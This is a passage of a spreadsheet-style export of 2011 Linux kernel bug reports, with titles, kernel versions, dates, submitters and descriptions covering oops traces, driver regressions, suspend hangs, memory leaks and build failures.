0.381247] [&lt;ffffffff81ace6cc&gt;] do_initcalls+0x2c/0x40 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381253] [&lt;ffffffff81ace84a&gt;] do_basic_setup+0x2a/0x30 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381259] [&lt;ffffffff81acec1a&gt;] kernel_init+0x8a/0x110 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381265] [&lt;ffffffff815e90a4&gt;] kernel_thread_helper+0x4/0x10 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381271] [&lt;ffffffff81aceb90&gt;] ? do_early_param+0xd0/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381277] [&lt;ffffffff815e90a0&gt;] ? gs_change+0x13/0x13 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381287] ---[ end trace 5a5d197966b56a2e ]--- Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381293] kobject_add_internal failed for GHES.9 with -EEXIST, don't try to register things with the same name in the same directory. Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381307] Pid: 1, comm: swapper Tainted: G W 3.0.0-0300rc2-generic #201106081532 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381311] Call Trace: Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381317] [&lt;ffffffff812e3ddc&gt;] kobject_add_internal+0xdc/0x110 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381323] [&lt;ffffffff812e3f8d&gt;] kobject_add_varg+0x5d/0x70 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381329] [&lt;ffffffff812e4099&gt;] kobject_add+0x69/0x90 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381335] [&lt;ffffffff813c7f89&gt;] ? dev_set_name+0x69/0x70 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381341] [&lt;ffffffff812e3baa&gt;] ? kobject_get+0x1a/0x30 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381346] [&lt;ffffffff811552ad&gt;] ? kmem_cache_alloc_trace+0x8d/0x110 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381352] [&lt;ffffffff813c9576&gt;] ? setup_parent+0x16/0x30 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381357] [&lt;ffffffff813c9641&gt;] device_add+0xb1/0x370 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381362] [&lt;ffffffff813cddc2&gt;] platform_device_add+0x182/0x1d0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381368] [&lt;ffffffff81b0b470&gt;] ? setup_hest_disable+0x20/0x20 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381373] [&lt;ffffffff81b0b4e5&gt;] hest_parse_ghes+0x75/0xa0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381378] [&lt;ffffffff813769c5&gt;] apei_hest_parse+0x65/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381384] [&lt;ffffffff81b0b553&gt;] hest_ghes_dev_register+0x43/0x90 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381389] [&lt;ffffffff81b0a96d&gt;] ? find_dock+0x23/0x23 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381394] [&lt;ffffffff81b0b63c&gt;] acpi_hest_init+0x9c/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381399] [&lt;ffffffff81b0a976&gt;] acpi_pci_root_init+0x9/0x32 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381405] [&lt;ffffffff81002168&gt;] do_one_initcall+0xe8/0x130 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381411] [&lt;ffffffff81ace6cc&gt;] do_initcalls+0x2c/0x40 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381417] [&lt;ffffffff81ace84a&gt;] do_basic_setup+0x2a/0x30 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381422] [&lt;ffffffff81acec1a&gt;] kernel_init+0x8a/0x110 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381428] [&lt;ffffffff815e90a4&gt;] kernel_thread_helper+0x4/0x10 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381434] [&lt;ffffffff81aceb90&gt;] ? do_early_param+0xd0/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381440] [&lt;ffffffff815e90a0&gt;] ? gs_change+0x13/0x13</t>
  </si>
  <si>
    <t>sdhci-pci fails on 3.0.0-rc1 on Dell E6510</t>
  </si>
  <si>
    <t>2011-06-13 17:02 UTC</t>
  </si>
  <si>
    <t>2011-08-28 19:18 UTC</t>
  </si>
  <si>
    <t>Subject : sdhci-pci fails on 3.0.0-rc1 on Dell E6510 Submitter : Oliver Hartkopp &lt;socketcan@hartkopp.net&gt; Date : 2011-06-07 20:06 References : http://article.gmane.org/gmane.linux.kernel.mmc/8442 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Radeon 9600 Mobile (RV350) freezes on glxgears - bisected</t>
  </si>
  <si>
    <t>2011-06-13 17:18 UTC</t>
  </si>
  <si>
    <t>Wolfram Sang</t>
  </si>
  <si>
    <t>Created attachment 61872 [details] kernelconfig Since 2.6.39 and also with 3.0-rc2, when starting glxgears, my machine freezes (as in "even caps/lock does not respond anymore"). Despite that, X-Server and 2D-stuff (shells, browsers) work fine all the time. Bisecting resulted in: 8410ea3b95d105a5be5db501656f44bbb91197c1 is the first bad commit commit 8410ea3b95d105a5be5db501656f44bbb91197c1 Author: Dave Airlie &lt;airlied@gmail.com&gt; Date: Wed Dec 15 03:16:38 2010 +1000 drm: rework PCI/platform driver interface. This abstracts the pci/platform interface out a step further, we can go further but this is far enough for now to allow USB to be plugged in. The drivers now just call the init code directly for their device type. Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; I can confirm that 2.6.38-rc5 worked fine and 2.6.39 with this commit reverted (and manually disabled drm_usb) works fine, too. Seems really to be the culprit. Note: I don't have DRM_RADEON_KMS enabled, if I do, there is no crash (but the framerate drops from 260fps to 13 fps). lspci: 01:00.0 VGA compatible controller: ATI Technologies Inc RV350 [Mobility Radeon 9600 M10] (prog-if 00 [VGA controller]) Subsystem: Fujitsu Technology Solutions Device 106b Flags: bus master, 66MHz, medium devsel, latency 64, IRQ 11 Memory at d0000000 (32-bit, prefetchable) [size=128M] I/O ports at b000 [size=256] Memory at ffcf0000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at ffcc0000 [disabled] [size=128K] Capabilities: [58] AGP version 2.0 Capabilities: [50] Power Management version 2 Kernel driver in use: radeonfb xorg.conf (changing options here did not have an effect): Section "Device" Identifier "Generic Video Card" Driver "radeon" Option "DynamicPM" "on" # Driver warns about FastWrite! # Option "AGPFastWrite" "on" # Don't try EXA! Very slow on this card! Option "AccelMethod" "XAA" # 4 does not work and freezes the machine :( Option "AGPMode" "2" Option "EnablePageFlip" "on" EndSection</t>
  </si>
  <si>
    <t>Lenovo U160 (i915 black screen)</t>
  </si>
  <si>
    <t>2.6.39.1</t>
  </si>
  <si>
    <t>2011-06-14 15:17 UTC</t>
  </si>
  <si>
    <t>Robse</t>
  </si>
  <si>
    <t>2012-03-25 18:43 UTC</t>
  </si>
  <si>
    <t>hi kernel.org, i have a problem with the new kernel 2.6.39.1 My netbook (Lenovo u160) have a i915 chipset. with the old kernel 2.6.38.8 the netbook start. with the new kernel 2.6.39, have the netbook a black screen. hibernate an sleeping doesn´t work on 2.6.38.8 and 2.6.39.1. sry for my bad english... robse</t>
  </si>
  <si>
    <t>The system crash a few time after start</t>
  </si>
  <si>
    <t>3.0.0-rc3</t>
  </si>
  <si>
    <t>2011-06-15 19:25 UTC</t>
  </si>
  <si>
    <t>JP Pozzi</t>
  </si>
  <si>
    <t>2011-06-22 07:24 UTC</t>
  </si>
  <si>
    <t>Hello, I ran 4.0.0-rc3 since yesterday (only a few hours) with no problems but today the system crash while I was doing an "apt-get update". I attach the crash report. System : Debian Amd64 CPU : AMD905E RAM : 8Go System on an SSD. Some other SATA disks mirrored. Regards JPP</t>
  </si>
  <si>
    <t>[OOPS] 3.0-rc1 cifs</t>
  </si>
  <si>
    <t>2011-06-15 19:54 UTC</t>
  </si>
  <si>
    <t>2011-07-10 09:46 UTC</t>
  </si>
  <si>
    <t>Subject : [OOPS] 3.0-rc1 cifs Submitter : Martijn Uffing &lt;mp3project@sarijopen.student.utwente.nl&gt; Date : 2011-06-09 20:15 Message-ID : Pine.LNX.4.64.1106092211500.19687@sarijopen.student.utwente.nl References : http://marc.info/?l=linux-kernel&amp;m=130765235926144&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>/scripts/depmod.sh ends up -rw-r--r-- 1 depmod.sh</t>
  </si>
  <si>
    <t>3.0-rc3, 3.0-rc4</t>
  </si>
  <si>
    <t>2011-06-15 23:49 UTC</t>
  </si>
  <si>
    <t>2011-06-26 22:41 UTC</t>
  </si>
  <si>
    <t>Even though the patch seems to create the scripts/depmod.sh file with the correct permissions, it ends up wrong once the patch is applied. diff --git a/scripts/depmod.sh b/scripts/depmod.sh new file mode 100755 index 0000000..3b029cb --- /dev/null +++ b/scripts/depmod.sh [lxde@asus-arch scripts]$ ls -al depmod.sh -rw-r--r-- 1 lxde lxde 1231 Jun 15 18:36 depmod.sh</t>
  </si>
  <si>
    <t>(ath5k) sc-&gt;ah is allocated in ath5k_init_softc() but is not freed</t>
  </si>
  <si>
    <t>2.38.3</t>
  </si>
  <si>
    <t>2011-06-16 07:10 UTC</t>
  </si>
  <si>
    <t>Tsyvarev Andrey</t>
  </si>
  <si>
    <t>2012-06-13 15:08 UTC</t>
  </si>
  <si>
    <t>Memory for "ah" field of "sc" structure is allocated via kzalloc() in ath5k_init_softc(). This function is called when driver is loaded and some wireless point is found (automatically) by the device. But it seems from the code that this memory is never freed after - there is no corresponded kfree for this field except error-path of ath5k_init_softc() itself. Dynamic memory leaks detector from KEDR (http://kedr.berlios.de/) reports about leaks from that allocation in case of simple use case: loading driver, waiting several seconds, unloading driver. Following freeing of block reported as leakage has not led to kernel failures - it seems that driver will not free allocated block neither directly nor indirectly. (This freeing was made with the kernel module designed by hand specially for that purpose.)</t>
  </si>
  <si>
    <t>kernel BUG at fs/inode.c</t>
  </si>
  <si>
    <t>linux-3.0-rc3</t>
  </si>
  <si>
    <t>2011-06-16 07:45 UTC</t>
  </si>
  <si>
    <t>Ross Lagerwall</t>
  </si>
  <si>
    <t>2011-06-17 12:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 62192 [details] The trace. While running ./configure on some software, the following occurred: """ [10239.158793] WARNING: at fs/inode.c:334 ihold+0x31/0x40() [10239.158795] Hardware name: 945GCT-M2 [10239.158797] Modules linked in: binfmt_misc nouveau ttm drm_kms_helper drm i2c_algo_bit mxm_wmi video snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq ppdev parport_pc snd_timer snd_seq_device usbhid snd hid soundcore lp snd_page_alloc parport [10239.158823] Pid: 22264, comm: rm Not tainted 3.0.0-rc3 #1 [10239.158825] Call Trace: [10239.158832] [&lt;ffffffff810604bf&gt;] warn_slowpath_common+0x7f/0xc0 [10239.158836] [&lt;ffffffff8106051a&gt;] warn_slowpath_null+0x1a/0x20 [10239.158839] [&lt;ffffffff811791f1&gt;] ihold+0x31/0x40 [10239.158843] [&lt;ffffffff8116ea2d&gt;] do_unlinkat+0x11d/0x1e0 [10239.158847] [&lt;ffffffff811658ea&gt;] ? sys_newfstatat+0x2a/0x40 [10239.158850] [&lt;ffffffff81170602&gt;] sys_unlinkat+0x22/0x40 [10239.158856] [&lt;ffffffff815dfb02&gt;] system_call_fastpath+0x16/0x1b [10239.158858] ---[ end trace 496b288b09c4834e ]--- [10239.158886] ------------[ cut here ]------------ [10239.158906] kernel BUG at fs/inode.c:1368! [10239.158912] invalid opcode: 0000 [#1] SMP [10239.158921] CPU 0 [10239.158925] Modules linked in: binfmt_misc nouveau ttm drm_kms_helper drm i2c_algo_bit mxm_wmi video snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq ppdev parport_pc snd_timer snd_seq_device usbhid snd hid soundcore lp snd_page_alloc parport [10239.158998] [10239.159003] Pid: 22264, comm: rm Tainted: G W 3.0.0-rc3 #1 ECS 945GCT-M2/945GCT-M2 [10239.159017] RIP: 0010:[&lt;ffffffff8117a5d9&gt;] [&lt;ffffffff8117a5d9&gt;] iput+0x189/0x1c0 [10239.159029] RSP: 0018:ffff880078463e68 EFLAGS: 00010202 [10239.159035] RAX: ffff880049285cc0 RBX: ffff8800441624a0 RCX: 00000001000f2a7e [10239.159043] RDX: 000000000000004c RSI: ffff8800258ec240 RDI: ffff8800441624a0 [10239.159051] RBP: ffff880078463e88 R08: 9018000000000000 R09: ffff8800441623f0 [10239.159060] R10: ff9de9ec3d7d3203 R11: ffffffff816236a0 R12: ffff8800441624a0 [10239.159067] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000003 [10239.159076] FS: 00007f92a1d5a720(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000 [10239.159085] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [10239.159092] CR2: 00007f92a1838200 CR3: 000000007a3ef000 CR4: 00000000000006f0 [10239.159099] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [10239.159109] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [10239.159117] Process rm (pid: 22264, threadinfo ffff880078462000, task ffff8800697bc4d0) [10239.159125] Stack: [10239.159129] ffff8800258ec240 ffff8800441624a0 0000000000000000 0000000000000000 [10239.159143] ffff880078463f68 ffffffff8116ea14 ffff88007b51d000 ffff880049285cc0 [10239.159157] 0000000d24d7be1d ffff880069463000 0000000000000000 0000000000000000 [10239.159171] Call Trace: [10239.159178] [&lt;ffffffff8116ea14&gt;] do_unlinkat+0x104/0x1e0 [10239.159186] [&lt;ffffffff811658ea&gt;] ? sys_newfstatat+0x2a/0x40 [10239.159194] [&lt;ffffffff81170602&gt;] sys_unlinkat+0x22/0x40 [10239.159202] [&lt;ffffffff815dfb02&gt;] system_call_fastpath+0x16/0x1b [10239.159210] Code: 15 ad 47 8c 00 83 05 8a 64 b6 00 01 48 89 05 9f 47 8c 00 48 89 42 08 48 89 93 80 00 00 00 48 c7 83 88 00 00 00 60 ed a3 81 eb c3 &lt;0f&gt; 0b be 2d 05 00 00 48 c7 c7 15 e4 7e 81 e8 14 5f ee ff e9 d1 [10239.159328] RIP [&lt;ffffffff8117a5d9&gt;] iput+0x189/0x1c0 [10239.159338] RSP &lt;ffff880078463e68&gt; [10239.167190] ---[ end trace 496b288b09c4834f ]--- [10241.401672] ------------[ cut here ]------------ [10241.401686] WARNING: at fs/inode.c:334 ihold+0x31/0x40() [10241.401688] Hardware name: 945GCT-M2 [10241.401690] Modules linked in: binfmt_misc nouveau ttm drm_kms_helper drm i2c_algo_bit mxm_wmi video snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq ppdev parport_pc snd_timer snd_seq_device usbhid snd hid soundcore lp snd_page_alloc parport [10241.401725] Pid: 22874, comm: rm Tainted: G D W 3.0.0-rc3 #1 [10241.401727] Call Trace: [10241.401735] [&lt;ffffffff810604bf&gt;] warn_slowpath_common+0x7f/0xc0 [10241.401738] [&lt;ffffffff8106051a&gt;] warn_slowpath_null+0x1a/0x20 [10241.401742] [&lt;ffffffff811791f1&gt;] ihold+0x31/0x40 [10241.401746] [&lt;ffffffff8116ea2d&gt;] do_unlinkat+0x11d/0x1e0 [10241.401750] [&lt;ffffffff811658ea&gt;] ? sys_newfstatat+0x2a/0x40 [10241.401754] [&lt;ffffffff81170602&gt;] sys_unlinkat+0x22/0x40 [10241.401761] [&lt;ffffffff815dfb02&gt;] system_call_fastpath+0x16/0x1b [10241.401763] ---[ end trace 496b288b09c48350 ]--- [10241.401792] ------------[ cut here ]------------ [10241.401811] kernel BUG at fs/inode.c:1368! [10241.401817] invalid opcode: 0000 [#2] SMP [10241.401828] CPU 0 [10241.401832] Modules linked in: binfmt_misc nouveau ttm drm_kms_helper drm i2c_algo_bit mxm_wmi video snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq ppdev parport_pc snd_timer snd_seq_device usbhid snd hid soundcore lp snd_page_alloc parport [10241.401915] [10241.401919] Pid: 22874, comm: rm Tainted: G D W 3.0.0-rc3 #1 ECS 945GCT-M2/945GCT-M2 [10241.401934] RIP: 0010:[&lt;ffffffff8117a5d9&gt;] [&lt;ffffffff8117a5d9&gt;] iput+0x189/0x1c0 [10241.401947] RSP: 0018:ffff88007ac93e68 EFLAGS: 00010202 [10241.401954] RAX: ffff880049285cc0 RBX: ffff88000f81abd0 RCX: 00000001000f2b5f [10241.401964] RDX: 000000000000000e RSI: ffff88007b36f600 RDI: ffff88000f81abd0 [10241.401973] RBP: ffff88007ac93e88 R08: f018000000000000 R09: ffff88000f81ab20 [10241.401981] R10: ffd27e57e85efe03 R11: ffffffff816236a0 R12: ffff88000f81abd0 [10241.401989] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000003 [10241.401998] FS: 00007f230bb20720(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000 [10241.402007] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [10241.402015] CR2: 00007f230b5fe200 CR3: 000000007b6f6000 CR4: 00000000000006f0 [10241.402023] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [10241.402031] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [10241.402558] Process rm (pid: 22874, threadinfo ffff88007ac92000, task ffff880078630000) [10241.403068] Stack: [10241.403572] ffff88007b36f600 ffff88000f81abd0 0000000000000000 0000000000000000 [10241.404087] ffff88007ac93f68 ffffffff8116ea14 ffff88007b51d000 ffff880049285cc0 [10241.404602] 0000000cd4cfdd61 ffff880069462000 0000000000000000 0000000000000000 [10241.405114] Call Trace: [10241.405611] [&lt;ffffffff8116ea14&gt;] do_unlinkat+0x104/0x1e0 [10241.406113] [&lt;ffffffff811658ea&gt;] ? sys_newfstatat+0x2a/0x40 [10241.406620] [&lt;ffffffff81170602&gt;] sys_unlinkat+0x22/0x40 [10241.407136] [&lt;ffffffff815dfb02&gt;] system_call_fastpath+0x16/0x1b [10241.407623] Code: 15 ad 47 8c 00 83 05 8a 64 b6 00 01 48 89 05 9f 47 8c 00 48 89 42 08 48 89 93 80 00 00 00 48 c7 83 88 00 00 00 60 ed a3 81 eb c3 &lt;0f&gt; 0b be 2d 05 00 00 48 c7 c7 15 e4 7e 81 e8 14 5f ee ff e9 d1 [10241.408744] RIP [&lt;ffffffff8117a5d9&gt;] iput+0x189/0x1c0 [10241.409260] RSP &lt;ffff88007ac93e68&gt; [10241.409775] ---[ end trace 496b288b09c48351 ]--- """ It seems like a bug in fs/inode.c. The filesystem is ext4. Core 2 Duo 3.0Ghz running Ubuntu Linux 11.04 with custom linux-3.0-rc3 kernel.</t>
  </si>
  <si>
    <t>Many ASUS laptops can't suspend with ehci_hcd loaded</t>
  </si>
  <si>
    <t>2.6.39 - 3.3-rc3</t>
  </si>
  <si>
    <t>2011-06-16 11:28 UTC</t>
  </si>
  <si>
    <t>2012-07-25 19:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 62212 [details] lspci -vv Suspend to RAM or to disk hangs after "Spinning down sda". If unload ehci_hcd, it suspends and resumes properly. I've built the kernel with CONFIG_PM_DEBUG=y CONFIG_PM_VERBOSE=y CONFIG_PM_ADVANCED_DEBUG=y but didn't see anything interesting on suspend, but can provide a photo anyway.</t>
  </si>
  <si>
    <t>Kernel panic when launching java process</t>
  </si>
  <si>
    <t>3.0.0-rc3 / 2.6.39.1 / 2.6.38.4 / 2.6.38.8 / 2.6.35.13 / 2.6.32.41</t>
  </si>
  <si>
    <t>2011-06-16 17:14 UTC</t>
  </si>
  <si>
    <t>yohan</t>
  </si>
  <si>
    <t>Created attachment 62282 [details] Trace against 2.6.32.41 without debugging enabled Hello, I have a stange kernel panic on a zimbra mail server (mysqld + server in java)... when the java process starts the system freeze... This is the first time that i have that kind of problem over 70 same kind servers. The hardware has been changed 3 times (2 times on AMD server, 1 time on Intel server). I join the traces on the intel platform, Tyan S7012 MB, 1 CPU Intel E5645, 48GB RAM, kernels 2.6.32.41 and 2.6.39.1 without debugging enabled and the output with the 2.6.32.41 with debugging enabled. It was tested on 2.6.32.41 / 2.6.35.13 / 2.6.38.4 / 2.6.38.8 / 2.6.39.1.... same thing. on 3.0.0-rc3 without debugging but with profiling, SECCOMP and CC_STACKPROTECTOR : when starting the java process, the OS reboot without any error message on the serial console. Thanks for helping. Yohan</t>
  </si>
  <si>
    <t>iwlagn with IOMMU enabled causes DMA Write faults</t>
  </si>
  <si>
    <t>2011-06-17 09:36 UTC</t>
  </si>
  <si>
    <t>Julian Stecklina</t>
  </si>
  <si>
    <t>2012-04-01 10:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 62492 [details] kernel log My wifi device causes DMA faults during initialization and association with an AP. This is on a ThinkPad X201s with the 6000AGN wifi (see below). IOMMU is enabled via intel_iommu=igfx_off commandline option. As far as I can tell the wifi works, although it might take longer to associate to an AP than without the IOMMU enabled. (complete log is attached) [ 62.238298] DRHD: handling fault status reg 2 [ 62.238305] DMAR:[DMA Write] Request device [02:00.0] fault addr ffe82000 [ 62.238307] DMAR:[fault reason 05] PTE Write access is not set [ 62.642904] DRHD: handling fault status reg 2 [ 62.642912] DMAR:[DMA Write] Request device [02:00.0] fault addr ffe30000 [ 62.642914] DMAR:[fault reason 05] PTE Write access is not set [ 64.006425] wlan0: direct probe to 08:17:35:82:b0:2d (try 1/3) [ 64.265438] DRHD: handling fault status reg 2 [ 64.265445] DMAR:[DMA Write] Request device [02:00.0] fault addr ffea0000 [ 64.265447] DMAR:[fault reason 05] PTE Write access is not set 02:00.0 Network controller: Intel Corporation WiFi Link 6000 Series (rev 35) Subsystem: Intel Corporation WiFi Link 6000 Series 3x3 6000AGN Flags: bus master, fast devsel, latency 0, IRQ 45 Memory at f2400000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [e0] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number 00-24-d7-ff-ff-5f-f1-64 Kernel driver in use: iwlagn Kernel modules: iwlagn</t>
  </si>
  <si>
    <t>CPU lockup during boot</t>
  </si>
  <si>
    <t>kernel-PAE-3.0-0.rc3.git5.1.fc16.i686</t>
  </si>
  <si>
    <t>2011-06-19 15:00 UTC</t>
  </si>
  <si>
    <t>Bruno Wolff III</t>
  </si>
  <si>
    <t>2011-08-15 08:07 UTC</t>
  </si>
  <si>
    <t>3.0 kernels mostly lockup during boot with a traceback. 2.6.39 does work for me.</t>
  </si>
  <si>
    <t>Support for system wifi switch on Lenovo ideapad S205</t>
  </si>
  <si>
    <t>2011-06-19 16:14 UTC</t>
  </si>
  <si>
    <t>Florian Heyer</t>
  </si>
  <si>
    <t>Created attachment 62882 [details] Output of dmidecode on Ideapad S205 Function keys work fine except for the hardware on/off switch for wifi on Lenovo Ideapad S205. After booting with switch in position "on" wifi is disabled. Loading module ideapad-laptop doesn't help. There exists a workaround with module acer-wmi: One can load the module "acer_wmi". After toggling the hardware switch "rfkill list" shows "hard blocked: no" and one can use wifi. After that one can unload acer_wmi and with only ideapad_laptop loaded the wifi switch works as expected powering wifi on/off.</t>
  </si>
  <si>
    <t>ehci_hcd runtime suspend breaks shutdown - Thinkpad T420s</t>
  </si>
  <si>
    <t>3.0-rc3</t>
  </si>
  <si>
    <t>2011-06-19 22:46 UTC</t>
  </si>
  <si>
    <t>I have thinkpad T420s and almost every time when I try to shout it dow it hangs or reboot. Actually it hangs on reboot. Please let me know how I can help in investigation.</t>
  </si>
  <si>
    <t>It's not possible to compile kernel if CONFIG_NETCONSOLE_DYNAMIC is turned on</t>
  </si>
  <si>
    <t>3.0-rc3+</t>
  </si>
  <si>
    <t>2011-06-20 19:09 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:09 UTC</t>
  </si>
  <si>
    <t>Hello guys, It's not possible to compile kernel if CONFIG_NETCONSOLE_DYNAMIC is turned on ... drivers/built-in.o: In function `netconsole_target_put': /usr/src/linux-3.0/drivers/net/netconsole.c:133: undefined reference to `config_item_put' drivers/built-in.o: In function `netconsole_target_get': /usr/src/linux-3.0/drivers/net/netconsole.c:127: undefined reference to `config_item_get' drivers/built-in.o: In function `netconsole_target_put': /usr/src/linux-3.0/drivers/net/netconsole.c:133: undefined reference to `config_item_put' drivers/built-in.o: In function `netconsole_target_get': /usr/src/linux-3.0/drivers/net/netconsole.c:127: undefined reference to `config_item_get' drivers/built-in.o: In function `netconsole_target_put': /usr/src/linux-3.0/drivers/net/netconsole.c:133: undefined reference to `config_item_put' drivers/built-in.o: In function `drop_netconsole_target': /usr/src/linux-3.0/drivers/net/netconsole.c:588: undefined reference to `config_item_put' drivers/built-in.o: In function `make_netconsole_target': /usr/src/linux-3.0/drivers/net/netconsole.c:561: undefined reference to `config_item_init_type_name' drivers/built-in.o: In function `dynamic_netconsole_init': /usr/src/linux-3.0/drivers/net/netconsole.c:109: undefined reference to `config_group_init' /usr/src/linux-3.0/drivers/net/netconsole.c:111: undefined reference to `configfs_register_subsystem' drivers/built-in.o: In function `dynamic_netconsole_exit': /usr/src/linux-3.0/drivers/net/netconsole.c:116: undefined reference to `configfs_unregister_subsystem' make: *** [.tmp_vmlinux1] Error 1 Thank you very much, David C. Hill</t>
  </si>
  <si>
    <t>Missing code to load firmware</t>
  </si>
  <si>
    <t>2011-06-20 21:44 UTC</t>
  </si>
  <si>
    <t>2012-09-28 22:55 UTC</t>
  </si>
  <si>
    <t>In commit 3ac5e26a1e935469a8bdae1d624bc3b59d1fcdc5 entitled "rtlwifi: rtl8192c-common: Change common firmware routines for addition of rtl8192se and rtl8192de", the firmware loading code was moved. Unfortunately, some necessary code was dropped for rtl8192cu. In the logs, the following messages are output: rtl8192c: Loading firmware file rtlwifi/rtl8192cufw.bin rtl8192c_common:_rtl92c_fw_free_to_go():&lt;0-0&gt; Polling FW ready fail!! REG_MCUFWDL:0x00000006 . rtl8192c_common:rtl92c_download_fw():&lt;0-0&gt; Firmware is not ready to run! In addition, the interface will authenticate and associate, but cannot transfer data.</t>
  </si>
  <si>
    <t>3.0-rc3: No RTC device found</t>
  </si>
  <si>
    <t>2011-06-23 17:30 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0-rc3: No RTC device found Submitter : Meelis Roos &lt;mroos@ut.ee&gt; Date : 2011-06-14 9:06 Message-ID : alpine.SOC.1.00.1106141203350.11764@math.ut.ee References : http://marc.info/?l=linux-kernel&amp;m=130804348901826&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>3.0-rc3 WARNING: at drivers/gpu/drm/i915/i915_drv.c:340 gen6_gt_force_wake_put+0x29/0x52 [i915]()</t>
  </si>
  <si>
    <t>2011-06-23 18:17 UTC</t>
  </si>
  <si>
    <t>2011-06-27 19:17 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0-rc3 WARNING: at drivers/gpu/drm/i915/i915_drv.c:340 gen6_gt_force_wake_put+0x29/0x52 [i915]() Submitter : "Kan-Ru Chen" &lt;kanru@kanru.info&gt; Date : 2011-06-14 12:12 Message-ID : 874o3sd33i.fsf@isil.kanru.info References : http://marc.info/?l=linux-kernel&amp;m=130805412314680&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>i915, framebuffer: wrong xoffset?</t>
  </si>
  <si>
    <t>2011-06-23 18:58 UTC</t>
  </si>
  <si>
    <t>2011-07-02 19:41 UTC</t>
  </si>
  <si>
    <t>Subject : i915, framebuffer: wrong xoffset? Submitter : Lucas De Marchi &lt;lucas.de.marchi@gmail.com&gt; Date : 2011-06-18 16:29 Message-ID : BANLkTikAJEma_NNi0NYnjBEB6RkFJK3Dpg@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130841462202826&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Every minutes, the ieee80211 ph0: wl_ops_bss_info_changed: BSS idle: true (implement) is shown in syslog</t>
  </si>
  <si>
    <t>3.0.0-rc4+ (and previous versions probably)</t>
  </si>
  <si>
    <t>2011-06-23 21:09 UTC</t>
  </si>
  <si>
    <t>Hi guys, The following 2 lines are shown every minutes in syslog: ieee80211 ph0: wl_ops_bss_info_changed: BSS idle: true (implement) ieee80211 ph0: wl_ops_bss_info_changed: BSS idle: false (implement) This is caused by the following lines: if (changed &amp; BSS_CHANGED_IDLE) { /* Idle changed for this BSS/interface */ wiphy_err(wiphy, "%s: BSS idle: %s (implement)\n", __func__, info-&gt;idle ? "true" : "false"); } Once a wireless connection is started, those messages disappear.</t>
  </si>
  <si>
    <t>WZab</t>
  </si>
  <si>
